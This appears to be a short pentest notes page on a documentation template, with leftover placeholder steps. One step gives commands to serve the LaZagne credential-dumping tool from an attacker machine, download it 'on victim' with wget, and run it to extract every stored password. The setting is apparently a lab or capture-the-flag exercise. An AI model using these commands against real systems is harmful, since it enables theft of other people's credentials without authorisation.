transfer of files

Step-by-step guide

Stepper blocks let you break down a tutorial or guide into separate, but clearly linked steps. Each step can contain multiple different blocks, allowing you to add detailed information.

1

compress a particaler folder !!

tar -czf lazagne-linux.tar.gz Linux

python3 -m http.server 8000

then on victim .............

wget http://10.10.x.x:8000/lazagne-linux.tar.gz
tar xzf lazagne-linux.tar.gz
cd Linux
python3 laZagne.py all
3

Add some content

Once you’ve inserted your stepper block, you can start adding content to it — including code blocks, drawings, images and much more.

4

Add more steps

Click the + below the step numbers or hit Enter twice to add another step to your stepper block. You can remove or change the style of the step header or step body if you wish.

Last updated

Was this helpful?